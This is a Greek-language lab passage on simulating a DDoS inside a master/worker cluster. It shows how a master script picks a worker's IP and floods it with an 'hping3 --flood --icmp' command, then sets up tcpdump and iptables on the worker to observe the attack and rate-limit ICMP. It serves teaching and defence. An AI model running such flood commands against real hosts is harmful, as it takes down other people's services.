* Για να πάρουμε την ip του όλου του δικτύου, θα εμφωλεύσουμε στη μεταβλητή network το περιεχόμενο της my_ip, αλλά το τελευταίο ψηφίο, τώρα είναι *.
* Για να πάρουμε την ip του όλου του δικτύου, θα εμφωλεύσουμε στη μεταβλητή network το περιεχόμενο της my_ip, αλλά το τελευταίο ψηφίο, τώρα είναι *.
**network=$(echo $my_ip | sed 's/.[0-9]$/.*/')**
**network=$(echo $my_ip | sed 's/.[0-9]$/.*/')**
Στη μεταβλητή worker περιέχεται η ip του πρώτου worker, όπως αυτός υπάρχει στο σμήνος. Εάν θέλουμε να επιτεθούμε σε κάποιον άλλο worker, θα βάλουμε το επιθυμητό ψηφίο στην παράμετρο **grep worker_ψηφίο**.
* Στη μεταβλητή worker περιέχεται η ip του πρώτου worker, όπως αυτός υπάρχει στο σμήνος. Εάν θέλουμε να επιτεθούμε σε κάποιον άλλο worker, θα βάλουμε το επιθυμητό ψηφίο στην παράμετρο **grep worker_ψηφίο**.
Τώρα που έχουμε τις απαραίτητες πληροφορίες, μπορούμε να εκτελέσουμε την επίθεση.
* Τώρα που έχουμε τις απαραίτητες πληροφορίες, μπορούμε να εκτελέσουμε την επίθεση.
**sudo hping3 -p 80 --flood --icmp $worker**
**sudo hping3 -p 80 --flood --icmp $worker**
______________________________________________
Χρησιμοποιώντας τα εργαλεία tcdump, netstat, αλλά και iptables, παρατηρούμε μέτρα για την αντιμετώπιση της επίθεσης, τα οποία παίρνει ο εκάστοτε worker.
Θα πρέπει να εγκαταστήσουμε τα εν λόγω εργαλεία:
**sudo apt update
sudo apt upgrade -y
sudo apt install tcpdump -y
sudo apt install iptables -y**
Στη συνέχεια θα γράψουμε ένα νέο script **worker.sh**, το οποίο θα περιλαμβάνει τη χρήση των εργαλείων.
* Όπως και στο master.sh, αποθηκεύουμε την ip του worker σε μία μεταβλητή.
* Μέσω των iptables βλέπουμε τι συμβαίνει στο worker κατά την επίθεση.
**sudo iptables -F**
* Για 2" παρακολουθούμε μόνο τα replies του επιτιθέμενου προς τον master (που εκτελέι την DDos). Χρησιμοποιώντας το firewall, φιλτράρονται τα εισερχόμενα πακέτα ICMP και θα πρέπει τα incoming να είναι όσα και οι απαντήσεις του worker.
**sudo timeout 2s tcpdump -i eth0 icmp and src $my_ip**
* Ως αντίμετρο, ο worker επιτρέπει μόνο ένα ICMP πακέτο/1"